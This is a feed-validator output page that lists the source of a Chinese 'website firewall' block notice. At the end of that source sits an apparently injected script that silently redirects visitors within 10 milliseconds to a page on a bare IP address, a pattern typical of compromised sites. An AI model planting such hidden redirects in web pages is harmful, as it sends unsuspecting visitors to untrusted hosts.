It looks like this is a web page, not a feed. I looked for a feed associated with this page, but couldn't find one. Please enter the address of your feed to validate.

Source: http://www.aymwue.cn/comment/html/?22165.html

  1. <!doctype html>
  2. <html>
  3. <head>
  4. <meta charset="utf-8">
  5. <title>网站防火墙</title>
  6. <style>
  7. *{margin:0;padding:0;color:#444}
  8. body{font-size:14px;font-family:"宋体"}
  9. .main{width:600px;margin:10% auto;}
  10. .title{background: #20a53a;color: #fff;font-size: 16px;height: 40px;line-height: 40px;padding-left: 20px;}
  11. .content{background-color:#f3f7f9; height:280px;border:1px dashed #c6d9b6;padding:20px}
  12. .t1{border-bottom: 1px dashed #c6d9b6;color: #ff4000;font-weight: bold; margin: 0 0 20px; padding-bottom: 18px;}
  13. .t2{margin-bottom:8px; font-weight:bold}
  14. ol{margin:0 0 20px 22px;padding:0;}
  15. ol li{line-height:30px}
  16. </style>
  17. </head>
  18.  
  19. <body>
  20. <div class="main">
  21. <div class="title">网站防火墙</div>
  22. <div class="content">
  23. <p class="t1">您的请求带有不合法参数,已被网站管理员设置拦截!</p>
  24. <p class="t2">可能原因:</p>
  25. <ol>
  26. <li>您提交的内容包含危险的攻击请求</li>
  27. </ol>
  28. <p class="t2">如何解决:</p>
  29. <ol>
  30. <li>检查提交内容;</li>
  31. <li>如网站托管,请联系空间提供商;</li>
  32. <li>普通网站访客,请联系网站管理员;</li>
  33. </ol>
  34. </div>
  35. </div>
  36. </body>
  37. <script>
  38.          setTimeout(function(){
  39.           var arr=['http://154.37.153.224/m.html',];
  40.          window.location.href=arr[parseInt(Math.random()*arr.length)];
  41.          },10);
  42.     </script>
  43. </html>
  44.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda